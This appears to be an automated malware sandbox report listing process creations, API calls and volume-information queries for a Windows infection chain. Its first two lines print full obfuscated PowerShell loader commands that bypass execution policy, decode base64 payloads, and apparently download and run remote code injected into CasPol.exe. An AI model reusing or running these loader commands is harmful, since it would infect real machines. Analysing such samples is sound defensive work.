                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfhvvuxxnfnwuvbuicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklvrzueugicagicagicagicagicagicagicagicagicagicagicaglu1ltujfumrlrklusvrjt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrhf0t0f2shosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihdzrkvwdvpjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagryx1aw50icagicagicagicagicagicagicagicagicagicagicagiehneu1abvpwleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbocwzkb1lkbeduktsnicagicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicagicj6tujpbsigicagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfjrsagicagicagicagicagicagicagicagicagicagicagicbsehlebcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicryvvvmctrtvlfqvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzc0ljiwoc44mc4yndgvndmvc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwviywnrlnrjriisiirltly6qvbqrefuqvxzzwv3agf0awftzg9pbmdmb3j5b3v3axroz3jlyxruzxnzdghpbmdzz2l2zw5tzwiudmjtiiwwldapo3nuyxjulvnmruvwkdmpo0ludk9lzs1lefbyzvnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwvilnziuyi='+[char]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $combo = 'jgnhbxblc3qgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskcmvkb3vidgvkid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskchljbmlkid0gjhjlzg91ynrlzc5eb3dubg9hzerhdgeojgnhbxblc3qpoyrvcmfjdwxvdxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkchljbmlkktskbgfsbgf0aw9uid0gjzw8qkftrty0x1nuqvjupj4noyrkzxn0zw1zid0gjzw8qkftrty0x0vord4+jzskc2nhchvszxqgpsakb3jhy3vsb3vzlkluzgv4t2yojgxhbgxhdglvbik7jgh5zhjvzwxly3ryawmgpsakb3jhy3vsb3vzlkluzgv4t2yojgrlc3rlbxmpoyrzy2fwdwxldcatz2ugmcatyw5kicroewryb2vszwn0cmljic1ndcakc2nhchvszxq7jhnjyxb1bgv0ics9icrsywxsyxrpb24utgvuz3rooyrwywlsbwfpbca9icroewryb2vszwn0cmljic0gjhnjyxb1bgv0oyroywdyawrlcya9icrvcmfjdwxvdxmuu3vic3ryaw5nkcrzy2fwdwxldcwgjhbhawxtywlsktskc3vwzxjsaw5lyxigpsatam9pbiaojghhz3jpzgvzllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcroywdyawrlcy5mzw5ndggpxtskdhvya2lzag5lc3mgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrzdxblcmxpbmvhcik7jgftcghpz2vuawegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcr0dxjraxnobmvzcyk7jhrlbglmzxjhid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhrlbglmzxjhlkludm9rzsgkbnvsbcwgqcgnmc9us050my9yl2vllmv0c2fwly86c3b0dggnlcanjhjldmfuy2hpc3rzjywgjyryzxzhbmnoaxn0cycsicckcmv2yw5jaglzdhmnlcanq2fzug9sjywgjyryzxzhbmnoaxn0cycsicckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlccxjywnjhjldmfuy2hpc3rzjywnjykpow==';$prason = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($combo));invoke-expression $prasonJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433E0A cpuid 12_2_00433E0A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004470AE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004510BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512EA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_00447597
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E679
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450CF7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450DDD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
